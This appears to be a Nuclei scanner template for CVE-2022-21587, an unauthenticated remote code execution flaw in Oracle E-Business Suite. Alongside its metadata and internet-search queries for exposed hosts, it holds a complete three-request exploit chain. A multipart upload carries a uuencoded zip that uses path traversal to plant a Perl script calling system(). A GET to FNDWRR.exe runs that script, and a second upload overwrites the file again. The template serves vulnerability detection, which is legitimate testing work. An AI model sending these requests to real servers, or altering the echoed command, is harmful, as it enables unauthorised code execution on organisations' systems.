90 lines
3.9 KiB
YAML
90 lines
3.9 KiB
YAML
id: CVE-2022-21587
|
|
|
|
info:
|
|
name: Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution
|
|
author: rootxharsh,iamnoooob,pdresearch
|
|
severity: critical
|
|
description: |
|
|
Oracle E-Business Suite 12.2.3 through 12.2.11 is susceptible to remote code execution via the Oracle Web Applications Desktop Integrator product, Upload component. An attacker with HTTP network access can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
|
|
remediation: |
|
|
Apply the necessary security patches provided by Oracle to mitigate this vulnerability.
|
|
reference:
|
|
- https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/
|
|
- https://www.oracle.com/security-alerts/cpuoct2022.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-21587
|
|
- http://packetstormsecurity.com/files/171208/Oracle-E-Business-Suite-EBS-Unauthenticated-Arbitrary-File-Upload.html
|
|
- https://github.com/manas3c/CVE-POC
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-21587
|
|
cwe-id: CWE-306
|
|
epss-score: 0.97364
|
|
epss-percentile: 0.99901
|
|
cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 3
|
|
vendor: oracle
|
|
product: e-business_suite
|
|
shodan-query: http.title:"login" "x-oracle-dms-ecid" 200
|
|
fofa-query: title="login" "x-oracle-dms-ecid" 200
|
|
google-query: intitle:"login" "x-oracle-dms-ecid" 200
|
|
tags: cve,cve2022,intrusive,ebs,unauth,kev,rce,oast,oracle,packetstorm
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv
|
|
|
|
------WebKitFormBoundaryZsMro0UsAQYLDZGv
|
|
Content-Disposition: form-data; name="bne:uueupload"
|
|
|
|
TRUE
|
|
------WebKitFormBoundaryZsMro0UsAQYLDZGv
|
|
Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"
|
|
|
|
begin 664 test.zip
|
|
M4$L#!!0``````"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO
|
|
M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.
|
|
M1%=24BYP;'5S92!#1TD["G!R:6YT($-'23HZ:&5A9&5R*"`M='EP92`]/B`G
|
|
M=&5X="]P;&%I;B<@*3L*;7D@)&-M9"`](")E8VAO($YU8VQE:2U#5D4M,C`R
|
|
M,BTR,34X-R(["G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI="`P.PH*4$L!`A0#
|
|
M%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````"XN+RXN
|
|
M+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R
|
|
G:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````
|
|
`
|
|
end
|
|
------WebKitFormBoundaryZsMro0UsAQYLDZGv--
|
|
- |
|
|
GET /OA_CGI/FNDWRR.exe HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv
|
|
|
|
------WebKitFormBoundaryZsMro0UsAQYLDZGv
|
|
Content-Disposition: form-data; name="bne:uueupload"
|
|
|
|
TRUE
|
|
------WebKitFormBoundaryZsMro0UsAQYLDZGv
|
|
Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"
|
|
|
|
begin 664 test.zip
|
|
M4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO
|
|
M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.
|
|
M1%=24BYP;`I02P$"%`,4``````!M<#16DP;7,@$````!````0P``````````
|
|
M````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5"4RUA
|
|
M<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`
|
|
(``!B````````
|
|
`
|
|
end
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- Nuclei-CVE-2022-21587
|
|
# digest: 4a0a00473045022032af4a350303b8c92a65b5b1cddca213edfb19eda931fd1c3414c457fe867137022100e99db72d927e85cc186ba25a3ae61c37bffb9e2804aaede9af586929b803458b:922c64590222798bb761d5b6d8e72950 |